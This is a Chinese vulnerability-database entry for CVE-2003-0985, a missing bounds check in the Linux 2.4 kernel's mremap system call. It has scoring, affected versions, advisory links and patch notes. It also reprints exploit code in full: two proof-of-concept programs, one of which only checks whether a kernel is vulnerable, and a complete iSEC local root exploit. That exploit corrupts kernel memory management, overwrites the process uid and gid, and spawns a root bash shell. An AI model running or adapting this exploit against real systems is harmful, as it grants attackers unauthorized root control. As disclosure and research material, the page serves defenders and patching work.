CVE-2003-0985
CVSS7.2
发布时间 :2004-01-20 00:00:00
修订时间 :2016-10-17 22:38:50
NMCOEPS    

[原文]The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform bounds checks, which allows local users to cause a denial of service and possibly gain privileges by causing a remapping of a virtual memory area (VMA) to create a zero length VMA, a different vulnerability than CAN-2004-0077.


[CNNVD]Linux kernel do_mremap本地权限提升漏洞(CNNVD-200401-034)

        
        Linux是一款开放源代码操作系统。
        Linux内核中的内存管理代码mremap(2)系统调用缺少正确边界检查,本地攻击者可以利用这个漏洞进行权限提升攻击,可以ROOT权限在系统上执行任意指令。
        mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。一般的VMA覆盖至少一个内存页(在i386架构上为4kB),do_mremap()内核代码执行重映射虚拟内存区域时发现缺少正确的边界检查,可导致建立0字节长度的虚拟内存区域。
        错误的分配虚拟内存区域可破坏其他内核内存管理子程序的操作,最终导致不可预料的后果。由于调用这个mremap(2)系统调用不需要任何特殊权限,正确利用此漏洞可导致在系统上建立和获得UIN 0 shell。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.4.0:test4Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.0:test5Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:linux:linux_kernel:2.4.21:pre4Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.21:pre7Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.4.0:test12Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test11Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.4.0:test1Linux Kernel 2.4.0 test1
cpe:/o:linux:linux_kernel:2.4.0:test10Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.18:pre1Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.19:pre1Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre2Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.18:pre6Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.18:pre3Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.4.18:pre4Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.19:pre5Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.4.19:pre6Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.21:pre1Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre3Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.18:pre7Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.19:pre4Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.18:pre8Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.18:pre5Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.0:test2Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.0:test3Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.4.0:test8Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.4.0:test9Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.0:test6Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.0:test7Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:867Red Hat Enterprise 3 Linux Kernel do_mremap Denial of Service Vulnerability
oval:org.mitre.oval:def:860Red Hat Linux Kernel do_mremap Denial of Service Vulnerability
oval:org.mitre.oval:def:10189The mremap system call (do_mremap) in Linux kernel 2.4.x before 2.4.21, and possibly other versions before 2.4.24, does not properly perform...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0985
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0985
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-034
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040102-01-U
(UNKNOWN)  SGI  20040102-01-U
http://archives.neohapsis.com/archives/bugtraq/2004-01/0070.html
(UNKNOWN)  BUGTRAQ  20040108 [slackware-security] Slackware 8.1 kernel security update (SSA:2004-008-01)
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000799
(UNKNOWN)  CONECTIVA  CLA-2004:799
http://download.immunix.org/ImmunixOS/7.3/updates/IMNX-2004-73-001-01
(UNKNOWN)  IMMUNIX  IMNX-2004-73-001-01
http://isec.pl/vulnerabilities/isec-0013-mremap.txt
(UNKNOWN)  MISC  http://isec.pl/vulnerabilities/isec-0013-mremap.txt
http://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremap
(UNKNOWN)  CONFIRM  http://klecker.debian.org/~joey/security/kernel/patches/patch.CAN-2005-0528.mremap
http://marc.info/?l=bugtraq&m=107332754521495&w=2
(UNKNOWN)  TRUSTIX  2004-0001
http://marc.info/?l=bugtraq&m=107332782121916&w=2
(UNKNOWN)  BUGTRAQ  20040105 Linux kernel mremap vulnerability
http://marc.info/?l=bugtraq&m=107340358402129&w=2
(UNKNOWN)  BUGTRAQ  20040105 Linux kernel do_mremap() proof-of-concept exploit code
http://marc.info/?l=bugtraq&m=107340814409017&w=2
(UNKNOWN)  BUGTRAQ  20040106 Linux mremap bug correction
http://marc.info/?l=bugtraq&m=107350348418373&w=2
(UNKNOWN)  BUGTRAQ  20040107 [slackware-security] Kernel security update (SSA:2004-006-01)
http://marc.info/?l=bugtraq&m=107394143105081&w=2
(UNKNOWN)  BUGTRAQ  20040112 SmoothWall Project Security Advisory SWP-2004:001
http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0
(UNKNOWN)  CONFIRM  http://svn.debian.org/wsvn/kernel/patch-tracking/CVE-2005-0528?op=file&rev=0&sc=0
http://www.ciac.org/ciac/bulletins/o-045.shtml
(UNKNOWN)  CIAC  O-045
http://www.debian.org/security/2004/dsa-413
(UNKNOWN)  DEBIAN  DSA-413
http://www.debian.org/security/2004/dsa-417
(UNKNOWN)  DEBIAN  DSA-417
http://www.debian.org/security/2004/dsa-423
(UNKNOWN)  DEBIAN  DSA-423
http://www.debian.org/security/2004/dsa-427
(UNKNOWN)  DEBIAN  DSA-427
http://www.debian.org/security/2004/dsa-439
(UNKNOWN)  DEBIAN  DSA-439
http://www.debian.org/security/2004/dsa-440
(UNKNOWN)  DEBIAN  DSA-440
http://www.debian.org/security/2004/dsa-442
(UNKNOWN)  DEBIAN  DSA-442
http://www.debian.org/security/2004/dsa-450
(UNKNOWN)  DEBIAN  DSA-450
http://www.debian.org/security/2004/dsa-470
(UNKNOWN)  DEBIAN  DSA-470
http://www.debian.org/security/2004/dsa-475
(UNKNOWN)  DEBIAN  DSA-475
http://www.debian.org/security/2006/dsa-1067
(UNKNOWN)  DEBIAN  DSA-1067
http://www.debian.org/security/2006/dsa-1069
(UNKNOWN)  DEBIAN  DSA-1069
http://www.debian.org/security/2006/dsa-1070
(UNKNOWN)  DEBIAN  DSA-1070
http://www.debian.org/security/2006/dsa-1082
(UNKNOWN)  DEBIAN  DSA-1082
http://www.kb.cert.org/vuls/id/490620
(UNKNOWN)  CERT-VN  VU#490620
http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24
(UNKNOWN)  CONFIRM  http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.24
http://www.linuxsecurity.com/advisories/engarde_advisory-3904.html
(VENDOR_ADVISORY)  ENGARDE  ESA-20040105-001
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:001
(UNKNOWN)  MANDRAKE  MDKSA-2004:001
http://www.novell.com/linux/security/advisories/2004_03_linux_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2004:003
http://www.redhat.com/support/errata/RHSA-2003-416.html
(UNKNOWN)  REDHAT  RHSA-2003:416
http://www.redhat.com/support/errata/RHSA-2003-417.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:417
http://www.redhat.com/support/errata/RHSA-2003-418.html
(UNKNOWN)  REDHAT  RHSA-2003:418
http://www.redhat.com/support/errata/RHSA-2003-419.html
(UNKNOWN)  REDHAT  RHSA-2003:419
http://www.securityfocus.com/bid/9356
(VENDOR_ADVISORY)  BID  9356
http://xforce.iss.net/xforce/xfdb/14135
(VENDOR_ADVISORY)  XF  linux-domremap-gain-privileges(14135)

- 漏洞信息

Linux kernel do_mremap本地权限提升漏洞
高危 边界条件错误
2004-01-20 00:00:00 2006-11-02 00:00:00
本地  
        
        Linux是一款开放源代码操作系统。
        Linux内核中的内存管理代码mremap(2)系统调用缺少正确边界检查,本地攻击者可以利用这个漏洞进行权限提升攻击,可以ROOT权限在系统上执行任意指令。
        mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。一般的VMA覆盖至少一个内存页(在i386架构上为4kB),do_mremap()内核代码执行重映射虚拟内存区域时发现缺少正确的边界检查,可导致建立0字节长度的虚拟内存区域。
        错误的分配虚拟内存区域可破坏其他内核内存管理子程序的操作,最终导致不可预料的后果。由于调用这个mremap(2)系统调用不需要任何特殊权限,正确利用此漏洞可导致在系统上建立和获得UIN 0 shell。
        

- 公告与补丁

        厂商补丁:
        Linux
        -----
        Linux 2.4.24已经修复这个安全问题,请到厂商的主页下载:
        
        http://www.kernel.org/

- 漏洞信息 (141)

Linux Kernel "do_mremap" Local Proof of Concept (EDBID:141)
linux local
2004-01-06 Verified
0 Christophe Devine
N/A [点击下载]
/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

// milw0rm.com [2004-01-06]
		

- 漏洞信息 (142)

Linux Kernel "do_mremap" Local Proof of Concept II (EDBID:142)
linux local
2004-01-07 Verified
0 Christophe Devine
N/A [点击下载]
/* 
 * Proof of concept code for testing do_mremap() Linux kernel bug.
 * It is based on the code by Christophe Devine and Julien Tinnes
 * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since 
 * it avoids any kernel data corruption.
 *
 * The following test was done against the Linux kernel 2.6.0. Similar 
 * results were obtained against the kernel 2.4.23 and previous ones.
 *
 * buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c
 * buffer@mintaka:~$ ./mremap_bug
 *
 * Base address : 0x60000000
 * 
 * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
 * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
 * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
 * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
 * 40016000-40017000 rw-p 00000000 00:00 0
 * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
 * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
 * 40156000-40159000 rw-p 00000000 00:00 0
 * 60000000-60002000 rw-p 00000000 00:00 0
 * bfffd000-c0000000 rwxp ffffe000 00:00 0
 * 
 * Remapping at 0x70000000...
 * 
 * 08048000-08049000 r-xp 00000000 03:03 2694       /home/buffer/mremap_bug
 * 08049000-0804a000 rw-p 00000000 03:03 2694       /home/buffer/mremap_bug
 * 40000000-40015000 r-xp 00000000 03:01 52619      /lib/ld-2.3.2.so
 * 40015000-40016000 rw-p 00014000 03:01 52619      /lib/ld-2.3.2.so
 * 40016000-40017000 rw-p 00000000 00:00 0
 * 40022000-40151000 r-xp 00000000 03:01 52588      /lib/libc-2.3.2.so
 * 40151000-40156000 rw-p 0012f000 03:01 52588      /lib/libc-2.3.2.so
 * 40156000-40159000 rw-p 00000000 00:00 0
 * 60000000-60002000 rw-p 00000000 00:00 0
 * 70000000-70000000 rw-p 00000000 00:00 0
 * bfffd000-c0000000 rwxp ffffe000 00:00 0
 * 
 * Report :
 * This kernel appears to be VULNERABLE
 *
 * Segmentation fault
 * buffer@mintaka:~$
 */

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <asm/unistd.h>
#include <errno.h>
  
#define MREMAP_FIXED    2

#define PAGESIZE 4096
#define VMASIZE  (2*PAGESIZE)
#define BUFSIZE  8192

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

#define MAPS_NO_CHECK 0
#define MAPS_CHECK    1

int mremap_check = 0;

void maps_check(char *buf)
{
	if (strstr(buf, "70000000"))
	    mremap_check++;
}

void read_maps(int fd, char *path, unsigned long flag) 
{
	ssize_t  nbytes;
        char     buf[BUFSIZE];

	if (lseek(fd, 0, SEEK_SET) < 0) {
		fprintf(stderr, "Unable to lseek %s\n", path);
		return;
	}

	while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) {

		if (flag & MAPS_CHECK)
			maps_check(buf);

		if (write(STDOUT_FILENO, buf, nbytes) != nbytes) {
			fprintf(stderr, "Unable to read %s\n", path);
			exit (1);
		}
	}
}

int main(int argc, char **argv)
{
	void     *base;
	char     path[16];
	pid_t    pid;
	int      fd;
	
	pid = getpid();
	sprintf(path, "/proc/%d/maps", pid);

	if ( !(fd = open(path, O_RDONLY))) {
		fprintf(stderr, "Unable to open %s\n", path);
		return 1;
	}

	base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE,
		    MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);

	printf("\nBase address : 0x%x\n\n", base);
	read_maps(fd, path, MAPS_NO_CHECK);

	printf("\nRemapping at 0x70000000...\n\n");
	base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
			   (void *)0x70000000);

	read_maps(fd, path, MAPS_CHECK);

	printf("\nReport : \n");
	(mremap_check) 
		? printf("This kernel appears to be VULNERABLE\n\n")
		: printf("This kernel appears to be NOT VULNERABLE\n\n");

	close(fd);
	return 0;
}

// milw0rm.com [2004-01-07]
		

- 漏洞信息 (145)

Linux Kernel 2.4.x mremap() bound checking Root Exploit (EDBID:145)
linux local
2004-01-15 Verified
0 Paul Starzetz
N/A [点击下载]
/*
 * Linux kernel mremap() bound checking bug exploit.
 *
 * Bug found by Paul Starzetz <paul isec pl>
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE	1
#define MREMAP_FIXED	2

#define str(s) 	#s
#define xstr(s) str(s)

#define DSIGNAL		SIGCHLD
#define CLONEFL		(DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR	0x2000

#define RNDINT		512

#define NUMVMA		(3 * 5 * 257)
#define NUMFORK		(17 * 65537)

#define DUPTO		1000
#define TMPLEN		256

#define __NR_sys_mremap	163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long
new_len,
			 unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid,
gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


void fatal(const char * msg)
{
	printf("\n");
	if (!errno) {
		fprintf(stderr, "FATAL: %s\n", msg);
	} else {
		perror(msg);
	}

	printf("\nentering endless loop");
	fflush(stdout);
	fflush(stderr);
	while (1) pause();
}

void kernel_code(void * file, loff_t offset, int origin)
{
	int i, c;
	int *v;

	if (!file)
		goto out;

	__asm__("movl	%%esp, %0" : : "m" (c));

	c &= 0xffffe000;
	v = (void *) c;

	for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
		if (v[i] == uid && v[i+1] == uid) {
			i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
		}
		if (v[i] == gid) {
			v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
			break;
		}
	}
out:
	dummy++;
}

void try_to_exploit(void)
{
	int v = 0;

	v += fops[0];
	v += fake_file[0];

	kernel_code(0, 0, v);
	lseek(DUPTO, 0, SEEK_SET);

	if (geteuid()) {
		printf("\nFAILED uid!=0"); fflush(stdout);
		errno =- ENOSYS;
		fatal("uid change");
	}

	printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

	kill(ppid, SIGUSR1);
	setresuid(0, 0, 0);
	sleep(1);

	printf("\n\n"); fflush(stdout);

	execl("/bin/bash", "bash", NULL);
	fatal("burp");
}

void cleanup(int v)
{
	victim[DUPTO] = victim[0];
	kill(0, SIGUSR2);
}


void redirect_filp(int v)
{
	printf("\n[!] parent check race... "); fflush(stdout);

	if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
		printf("SUCCESS, cought SLAB page!"); fflush(stdout);
		victim[DUPTO] = (unsigned) & fake_file;
		signal(SIGUSR1, &cleanup);
		kill(pid, SIGUSR1);
	} else {
		printf("FAILED!");
	}
	fflush(stdout);
}

int get_slab_objs(void)
{
	FILE * fp;
	int c, d, u = 0, a = 0;
	static char line[TMPLEN], name[TMPLEN];

	fp = fopen("/proc/slabinfo", "r");
	if (!fp)
		fatal("fopen");

	fgets(name, sizeof(name) - 1, fp);
	do {
		c = u = a =- 1;
		if (!fgets(line, sizeof(line) - 1, fp))
			break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
	} while (strcmp(name, "size-4096"));
	
	fclose(fp);

	return c == 7 ? a - u : -1;
}

void unprotect(int v)
{
	int n, c = 1;

	*victim = 0;
	printf("\n[+] parent unprotected PTE "); fflush(stdout);

	dup2(0, 2);
	while (1) {
		n = get_slab_objs();
		if (n < 0)
			fatal("read slabinfo");
		if (n > 0) {
			printf("\n    depopulate SLAB #%d", c++);
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
		}
		if (!n) {
			blah = 0; kill(hpid, SIGUSR1);
			while (!blah) pause();
			dup2(0, DUPTO);
			break;
		}
	}

	signal(SIGUSR1, &redirect_filp);
	kill(pid, SIGUSR1);
}

void cleanup_vmas(void)
{
	int i = NUMVMA;

	while (1) {
		tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
				MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
		if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap1");
		}
		i--;
		if (!i)
			break;

	tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
				MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) {
			printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
			fatal("unmap2");
		}
		i--;
		if (!i)
			break;
	}
}

void catchme(int v)
{
	blah++;
}

void exitme(int v)
{
	_exit(0);
}

void childrip(int v)
{
	waitpid(-1, 0, WNOHANG);
}

void slab_helper(void)
{
	signal(SIGUSR1, &catchme);
	signal(SIGUSR2, &exitme);
	blah = 0;

	while (1) {
		while (!blah) pause();

		blah = 0;
		if (!fork()) {
			dup2(0, DUPTO);
			kill(getppid(), SIGUSR1);
			while (1) pause();
		} else {
			while (!blah) pause();
			blah = 0; kill(ppid, SIGUSR2);
		}
	}
	exit(0);
}

int main(void)
{
	int i, r, v, cnt;
	time_t start;

	srand(time(NULL) + getpid());
	ppid = getpid();
	uid = getuid();
	gid = getgid();

	hpid = fork();
	if (!hpid)
		slab_helper();

	fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (fops == MAP_FAILED)
		fatal("mmap fops VMA");
	for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
		fops[i] = (unsigned)&kernel_code;
	for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
		fake_file[i] = (unsigned)fops;

	vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_ro == MAP_FAILED)
		fatal("mmap1");

	vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (vma_rw == MAP_FAILED)
		fatal("mmap2");

	cnt = NUMVMA;
	while (1) {
		r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap1");
		}
		cnt--;
		if (!cnt) break;

		r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
		if (r == (-1)) {
			printf("\n[-] ERROR remapping"); fflush(stdout);
			fatal("remap2");
		}
		cnt--;
		if (!cnt) break;
	}

	victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
			MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
	if (victim != (void *) PAGEADDR)
		fatal("mmap victim VMA");

	v = *victim;
	*victim = v + 1;

	signal(SIGUSR1, &unprotect);
	signal(SIGUSR2, &catchme);
	signal(SIGCHLD, &childrip);
	printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
	start = time(NULL);

	cnt = NUMFORK;
	v = 0;
	while (1) {
		cnt--;
		v--;
		dummy += *victim;

		if (cnt > 1) {
			__asm__(
			"pusha				\n"
			"movl %1, %%eax			\n"
			"movl $("xstr(CLONEFL)"), %%ebx	\n"
			"movl %%esp, %%ecx		\n"
			"movl $120, %%eax		\n"
			"int  $0x80			\n"
			"movl %%eax, %0			\n"
			"popa				\n"
			: : "m" (pid), "m" (dummy)
			);
		} else {
			pid = fork();
		}

		if (pid) {
			if (v <= 0 && cnt > 0) {
				float eta, tm;
				v = rand() % RNDINT / 2 + RNDINT / 2;
				tm = eta = (float)(time(NULL) - start);
				eta *= (float)NUMFORK;
				eta /= (float)(NUMFORK - cnt);
				printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
				NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
				fflush(stdout);
			}
			if (cnt) {
				waitpid(pid, 0, 0);
				continue;
			}
			if (!cnt) {
				while (1) {
					 r = wait(NULL);
					 if (r == pid) {
					cleanup_vmas();
					while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
					 }
				}
			}
		}

		else {
			cleanup_vmas();

			if (cnt > 0) {
				_exit(0);
			}

		printf("\n[+] overflow done, the moment of truth..."); fflush(stdout);
			sleep(1);

			signal(SIGUSR1, &catchme);
			munmap(0, PAGE_SIZE);
			dup2(0, 2);
			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();

			munmap((void *)victim, PAGE_SIZE);
			dup2(0, DUPTO);

			blah = 0; kill(ppid, SIGUSR1);
			while (!blah) pause();
			try_to_exploit();
			while (1) pause();
		}
	}
	return 0;
}



// milw0rm.com [2004-01-15]
		

- 漏洞信息 (F32515)

isec-0013v2-mremap.txt (PacketStormID:F32515)
2004-01-15 00:00:00
Wojciech Purczynski,Paul Starzetz  isec.pl
advisory,arbitrary,kernel,local
linux
CVE-2003-0985
[点击下载]

The mremap system call in the Linux kernel memory management code has a critical security vulnerability due to incorrect bounds checking. Proper exploitation of this vulnerability may lead to local privilege escalation including execution of arbitrary code with kernel level access. Updated version of the original release of this document.

Synopsis:    Linux kernel do_mremap local privilege escalation vulnerability
Product:     Linux kernel
Version:     2.4 up to 2.4.23 and 2.6.0
Vendor:      http://www.kernel.org/

URL:         http://isec.pl/vulnerabilities/isec-0013-mremap.txt
CVE:         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0985
Author:      Paul Starzetz <ihaquer@isec.pl>,
             Wojciech Purczynski <cliph@isec.pl>

Date:        January 5, 2004
Update:      January 15, 2004


Issue:
======

A critical security vulnerability has been found in the Linux kernel
memory management code in mremap(2) system call due to incorrect bound
checks.


Vulnerability details:
======================

The mremap system call provides functionality of resizing (shrinking or
growing) as well as moving across process's addressable space of existing
virtual memory areas (VMAs) or any of its parts.

A typical VMA covers at least one memory page (which is exactly 4kB on
the i386  architecture). An incorrect bound check discovered inside the
do_mremap() kernel code performing remapping of a virtual memory area
may lead to creation of a virtual memory area of 0 bytes in length.

The problem bases on the general mremap flaw that remapping of 2 pages
from inside a VMA creates a memory hole of only one page in length but
also an additional VMA of two pages. In the case of a zero sized
remapping request no VMA hole is created but an additional VMA descriptor
of 0 bytes in length is created.

Such a malicious virtual memory area may disrupt the operation of the other
parts of the kernel memory management subroutines finally leading to 
unexpected behavior.

A typical process's memory layout showing invalid VMA created with
mremap system call:

    08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test
    0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test
    0804d000-0804e000 rwxp 00000000 00:00 0
    40000000-40014000 r-xp 00000000 03:05 1544523    /lib/ld-2.3.2.so
